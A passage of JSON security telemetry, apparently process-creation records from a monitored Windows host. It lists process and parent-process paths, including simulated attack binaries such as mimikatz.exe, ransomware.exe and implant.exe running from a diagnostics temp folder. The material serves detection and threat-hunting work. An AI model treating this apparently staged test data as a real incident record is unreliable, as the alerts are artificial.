cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring 